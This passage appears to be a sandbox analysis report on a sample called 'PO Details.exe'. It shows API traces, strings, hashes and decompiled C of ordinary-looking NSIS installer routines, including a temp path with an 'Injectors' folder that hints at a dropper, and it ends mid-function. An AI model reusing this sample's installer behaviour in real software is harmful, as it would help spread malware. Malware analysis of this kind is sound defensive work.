0x004017d0
0x004017db
0x004017db
0x004017ec
0x004017ee
0x004017ee
0x004017ef
0x004017ef
0x004017f2
0x004017f5
0x004017f8
0x004017f8
0x004017ff
0x0040180e
0x00401813
0x00401816
0x00401819
0x00000000
0x00000000
0x0040181b
0x0040181e
0x00401874
0x00401879
0x004015b6
0x00402925
0x00402925
0x00402bc2
0x00402bc5
0x00402bc5
0x00000000
0x00401820
0x00401826
0x0040182d
0x0040183a
0x00401845
0x0040185b
0x0040185b
0x0040185e
0x00000000
0x00401864
0x00401864
0x00401865
0x00401882
0x00402bcb
0x00402bcb
0x00402bcb
0x00401867
0x00401867
0x00401868
0x00401493
0x00402395
0x00402395
0x00402395
0x00401865
0x0040185e
0x00402bcd
0x00402bd1
0x00402bd1
0x00401892
0x00401897
0x004018a5
0x004018aa
0x004018b0
0x004018b4
0x004018b6
0x004018be
0x004018ca
0x004018b8
0x004018b8
0x004018bc
0x00000000
0x00000000
0x004018bc
0x004018d3
0x004018d9
0x004018db
0x00000000
0x004018e1
0x004018e1
0x004018e4
0x004018fc
0x004018e6
0x004018e9
0x004018f2
0x004018f2
0x00401901
0x00401906
0x00402390
0x00000000
0x00402390
0x00000000

APIs

lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts,?,?,00000031), ref: 004017D5

Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E

Part of subcall function 00405479: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
Part of subcall function 00405479: lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
Part of subcall function 00405479: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,004033B0), ref: 004054D4
Part of subcall function 00405479: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll), ref: 004054E6
Part of subcall function 00405479: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
Part of subcall function 00405479: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
Part of subcall function 00405479: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534

Strings

C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts, xrefs: 0040179E
C:\Users\user\AppData\Local\Temp\nsm89AB.tmp, xrefs: 00401821, 0040183F
Call, xrefs: 0040178D, 004017A3, 004017B5, 004017C1, 004017F7, 0040180D, 0040182B, 00401867, 004018E8, 004018F1, 004018FB, 00401906
C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll, xrefs: 00401835, 00401851

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID: C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts$C:\Users\user\AppData\Local\Temp\nsm89AB.tmp$C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll$Call
API String ID: 1941528284-1108400902
Opcode ID: 7e87e1a5c3e28606f7f1f906368cd53c718ee535b89dc048ffa7976d1435412e
Instruction ID: 3db4763bd34d6378758f0dea6881e25fdbecc032a5989a9cd586940b12637d70
Opcode Fuzzy Hash: 7e87e1a5c3e28606f7f1f906368cd53c718ee535b89dc048ffa7976d1435412e
Instruction Fuzzy Hash: 13419471500118BACF10BFA5CD85DAE7A79EF45368B20423FF512B21E1DB3C89919A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00405479 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405479(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ee4; // 0x10392
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fd4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E0040644E(_t38, 0, 0x42c248, 0x42c248, _a4);
					}
					_t27 = lstrlenW(0x42c248);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ec8, 0x42c248); // executed
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c248;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0); // executed
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52); // executed
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0); // executed
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c248[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c248, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

0x0040547f
0x00405489
0x0040548e
0x00405494
0x0040549f
0x004054a2
0x004054a5
0x004054ab
0x004054ab
0x004054b1
0x004054b9
0x004054bc
0x004054d9
0x004054dd
0x004054e6
0x004054e6
0x004054f0
0x004054f9
0x00405505
0x0040550c
0x00405510
0x00405513
0x00405526
0x00405534
0x00405534
0x00405538
0x0040553a
0x0040553d
0x00000000
0x0040553d
0x004054be
0x004054c6
0x004054ce
0x004054d4
0x00000000
0x004054d4
0x004054ce
0x004054bc
0x00405549

APIs

lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000,?), ref: 004054B1
lstrlenW.KERNEL32(004033B0,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,00000000,00425A20,766923A0,?,?,?,?,?,?,?,?,?,004033B0,00000000), ref: 004054C1
lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,004033B0), ref: 004054D4
SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll), ref: 004054E6
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040550C
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405526
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405534

Strings

Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll, xrefs: 0040549A, 004054AA, 004054B0, 004054D3, 004054DF

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsm89AB.tmp\System.dll
API String ID: 2531174081-1798509565
Opcode ID: aa92cd18e633272a9061a8b6b08b7c49714f2ce68e846d27045f56b788a6f560
Instruction ID: 1ccddca99fa11d5427df38f31253403cabd393798f33362a1a37d4b4032a7ea7
Opcode Fuzzy Hash: aa92cd18e633272a9061a8b6b08b7c49714f2ce68e846d27045f56b788a6f560
Instruction Fuzzy Hash: 42219A71900518BBCB219F95DD85ACFBFB9EF45354F10803AF904B22A0C7798A908FA8

Uniqueness

Uniqueness Score: -1.00%

Function 004026E4 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E004026E4(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
				intOrPtr _t65;
				intOrPtr _t66;
				intOrPtr _t72;
				void* _t76;
				void* _t79;

				_t72 = __edx;
				 *((intOrPtr*)(_t76 - 8)) = __ebx;
				_t65 = 2;
				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
				_t66 = E00402D1C(_t65);
				_t79 = _t66 - 1;
				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
				if(_t79 < 0) {
					L36:
					 *0x434fa8 =  *0x434fa8 +  *(_t76 - 4);
				} else {
					__ecx = 0x3ff;
					if(__eax > 0x3ff) {
						 *(__ebp - 0x44) = 0x3ff;
					}
					if( *__edi == __bx) {
						L34:
						__ecx =  *(__ebp - 0xc);
						__eax =  *(__ebp - 8);
						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
						if(_t79 == 0) {
							 *(_t76 - 4) = 1;
						}
						goto L36;
					} else {
						 *(__ebp - 0x38) = __ebx;
						 *(__ebp - 0x18) = E00406371(__ecx, __edi);
						if( *(__ebp - 0x44) > __ebx) {
							do {
								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E00405FE8( *(__ebp - 0x18), __ebx) >= 0) {
										__eax = __ebp - 0x50;
										if(E00405F8A( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
											goto L34;
										} else {
											goto L21;
										}
									} else {
										goto L34;
									}
								} else {
									__eax = __ebp - 0x40;
									_push(__ebx);
									_push(__ebp - 0x40);
									__eax = 2;
									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??); // executed
									if(__eax == 0) {
										goto L34;
									} else {
										__ecx =  *(__ebp - 0x40);
										if(__ecx == __ebx) {
											goto L34;
										} else {
											__ax =  *(__ebp + 0xa) & 0x000000ff;
											 *(__ebp - 0x4c) = __ecx;
											 *(__ebp - 0x50) = __eax;
											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
												L28:
												__ax & 0x0000ffff = E00406358( *(__ebp - 0xc), __ax & 0x0000ffff);
											} else {
												__ebp - 0x50 = __ebp + 0xa;
												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
													L21:
													__eax =  *(__ebp - 0x50);
												} else {
													__edi =  *(__ebp - 0x4c);
													__edi =  ~( *(__ebp - 0x4c));
													while(1) {
														_t22 = __ebp - 0x40;
														 *_t22 =  *(__ebp - 0x40) - 1;
														__eax = 0xfffd;
														 *(__ebp - 0x50) = 0xfffd;
														if( *_t22 == 0) {
															goto L22;
														}
														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
														__edi = __edi + 1;
														__eax = SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1); // executed
														__ebp - 0x50 = __ebp + 0xa;
														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
															continue;
														} else {
															goto L21;
														}
														goto L22;
													}
												}
												L22:
												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
													goto L28;
												} else {
													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
														} else {
															__ecx =  *(__ebp - 0xc);
															__edx =  *(__ebp - 8);
															 *(__ebp - 8) =  *(__ebp - 8) + 1;
															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														}
														goto L34;
													} else {
														__ecx =  *(__ebp - 0xc);
														__edx =  *(__ebp - 8);
														 *(__ebp - 8) =  *(__ebp - 8) + 1;
														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
														 *(__ebp - 0x38) = __eax;
														if(__ax == __bx) {
															goto L34;
														} else {
															goto L26;
														}
													}
												}
											}
										}
									}
								}
								goto L37;
								L26:
								__eax =  *(__ebp - 8);
							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
						}
						goto L34;
					}
				}
				L37:
				return 0;
			}

0x004026e4
0x004026e6
0x004026e9
0x004026eb
0x004026ee
0x004026f3
0x004026f7
0x004026fa
0x004026fd
0x00402bc2
0x00402bc5
0x00402703
0x00402703
0x0040270a
0x0040270c
0x0040270c
0x00402712
0x00402876
0x00402876
0x00402879
0x0040287e
0x004015b6
0x00402925
0x00402925
0x00000000
0x00402718
0x00402719
0x00402724
0x00402727
0x00402733
0x00402737
0x004027cf
0x004027e7
0x004027f7
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040273d
0x0040273d
0x00402740
0x00402741
0x00402744
0x00402749
0x00402750
0x00402758
0x00000000
0x0040275e
0x0040275e
0x00402763
0x00000000
0x00402769
0x00402769
0x00402771
0x00402774
0x00402777
0x00402832
0x00402839
0x0040277d
0x00402783
0x0040278f
0x004027f9
0x004027f9
0x00402791
0x00402791
0x00402794
0x00402796
0x00402796
0x00402796
0x00402799
0x0040279e
0x004027a1
0x00000000
0x00000000
0x004027a3
0x004027a6
0x004027ae
0x004027ba
0x004027c8
0x00000000
0x004027ca
0x00000000
0x004027ca
0x00000000
0x004027c8
0x00402796
0x004027fc
0x004027ff
0x00000000
0x00402801
0x00402806
0x00402847
0x00402869
0x00402870
0x00402855
0x00402855
0x00402858
0x0040285b
0x0040285e
0x0040285e
0x00000000
0x0040280f
0x0040280f
0x00402812
0x00402815
0x0040281b
0x0040281f
0x00402822
0x00000000
0x00000000
0x00000000
0x00000000
0x00402822
0x00402806
0x004027ff
0x00402777
0x00402763
0x00402758
0x00000000
0x00402824
0x00402824
0x00402827
0x00402830
0x00000000
0x00402727
0x00402712
0x00402bcb
0x00402bd1

APIs

ReadFile.KERNELBASE(?,?,?,?), ref: 00402750
MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 0040278B
SetFilePointer.KERNELBASE(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027AE
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027C4

Part of subcall function 00405FE8: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405FFE

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402870

Strings

9, xrefs: 00402733

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
Instruction ID: fc85df120a24998764995467ff6edc9a451c04e372c05a6abf1f77cf4653f2d7
Opcode Fuzzy Hash: 939078a54e4475671e6551d3fd19772fabc7f31a6bf9158e4a480f344115c940
Instruction Fuzzy Hash: 5C51F975D00219ABDF20DF95CA89AAEBB79FF04344F10817BE501B62D0E7B49D828B58

Uniqueness

Uniqueness Score: -1.00%

Function 00405948 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405948(WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES _v16;
				struct _SECURITY_DESCRIPTOR _v36;
				int _t22;
				long _t23;

				_v36.Sbz1 = _v36.Sbz1 & 0x00000000;
				_v36.Owner = 0x4083f8;
				_v36.Group = 0x4083f8;
				_v36.Sacl = _v36.Sacl & 0x00000000;
				_v16.bInheritHandle = _v16.bInheritHandle & 0x00000000;
				_v16.lpSecurityDescriptor =  &_v36;
				_v36.Revision = 1;
				_v36.Control = 4;
				_v36.Dacl = 0x4083e8;
				_v16.nLength = 0xc;
				_t22 = CreateDirectoryW(_a4,  &_v16); // executed
				if(_t22 != 0) {
					L1:
					return 0;
				}
				_t23 = GetLastError();
				if(_t23 == 0xb7) {
					if(SetFileSecurityW(_a4, 0x80000007,  &_v36) != 0) {
						goto L1;
					}
					return GetLastError();
				}
				return _t23;
			}

0x00405953
0x00405957
0x0040595a
0x00405960
0x00405964
0x00405968
0x00405970
0x00405977
0x0040597d
0x00405984
0x0040598b
0x00405993
0x00405995
0x00000000
0x00405995
0x0040599f
0x004059a6
0x004059bc
0x00000000
0x00000000
0x00000000
0x004059be
0x004059c2

APIs

CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040598B
GetLastError.KERNEL32 ref: 0040599F
SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004059B4
GetLastError.KERNEL32 ref: 004059BE

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 0040596E
C:\Users\user\Desktop, xrefs: 00405948

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: ErrorLast$CreateDirectoryFileSecurity
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
API String ID: 3449924974-26219170
Opcode ID: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction ID: 2a6702a12d34049f0ed6173726a665453ef4396ebd7eb618d4b77e108423b323
Opcode Fuzzy Hash: 79915fdb32ce531948ad707932686e2b3240d3ac97543659e1c0f9af800e449c
Instruction Fuzzy Hash: 720108B1C10219EADF019BA4D948BEFBFB8EF04314F00803AD544B6180D77896488BA9

Uniqueness

Uniqueness Score: -1.00%

Function 00406796 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00406796(intOrPtr _a4) {
				short _v576;
				signed int _t13;
				struct HINSTANCE__* _t17;
				signed int _t19;
				void* _t24;

				_t13 = GetSystemDirectoryW( &_v576, 0x104);
				if(_t13 > 0x104) {
					_t13 = 0;
				}
				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
					_t19 = 1;
				} else {
					_t19 = 0;
				}
				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
				return _t17;
			}

0x004067ad
0x004067b6
0x004067b8
0x004067b8
0x004067bc
0x004067cf
0x004067c9
0x004067c9
0x004067c9
0x004067e8
0x004067fc
0x00406803

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004067AD
wsprintfW.USER32 ref: 004067E8
LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 004067FC

Strings

\, xrefs: 004067BE
UXTHEME, xrefs: 0040679F
%s%S.dll, xrefs: 004067E2

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%S.dll$UXTHEME$\
API String ID: 2200240437-1946221925
Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction ID: 2cc1ede9ae180511fd9dc47da010e879a2503ad1dada0433f9440106b5f2728e
Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
Instruction Fuzzy Hash: 86F09670510119A7DB24BF64DE4DF9B366CAB00709F11447AA646F21D0EB7C9A68CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405F36 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00405F36(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				intOrPtr _v8;
				short _v12;
				short _t12;
				intOrPtr _t13;
				signed int _t14;
				WCHAR* _t17;
				signed int _t19;
				signed short _t23;
				WCHAR* _t26;

				_t26 = _a4;
				_t23 = 0x64;
				while(1) {
					_t12 =  *L"nsa"; // 0x73006e
					_t23 = _t23 - 1;
					_v12 = _t12;
					_t13 =  *0x40a57c; // 0x61
					_v8 = _t13;
					_t14 = GetTickCount();
					_t19 = 0x1a;
					_v8 = _v8 + _t14 % _t19;
					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
					if(_t17 != 0) {
						break;
					}
					if(_t23 != 0) {
						continue;
					} else {
						 *_t26 =  *_t26 & _t23;
					}
					L4:
					return _t17;
				}
				_t17 = _t26;
				goto L4;
			}

0x00405f3c
0x00405f42
0x00405f43
0x00405f43
0x00405f48
0x00405f49
0x00405f4c
0x00405f51
0x00405f54
0x00405f5e
0x00405f6b
0x00405f6f
0x00405f77
0x00000000
0x00000000
0x00405f7b
0x00000000
0x00405f7d
0x00405f7d
0x00405f7d
0x00405f80
0x00405f83
0x00405f83
0x00405f86
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00405F54
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\PO Details.exe" ,004034C3,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040370F), ref: 00405F6F

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F3B
"C:\Users\user\Desktop\PO Details.exe" , xrefs: 00405F36
nsa, xrefs: 00405F43

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: "C:\Users\user\Desktop\PO Details.exe" $C:\Users\user\AppData\Local\Temp\$nsa
API String ID: 1716503409-1589949399
Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction ID: 6280ba3094977af7574bcd42248b285f756f81412eced5037130b5adcb3d4edb
Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
Instruction Fuzzy Hash: 55F03676B00204BFDB10CF55DD05E9FB7ADEB95750F10803AEE44F7150E6B499548B58

Uniqueness

Uniqueness Score: -1.00%

Function 6E491777 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

			E6E491777(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v136;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
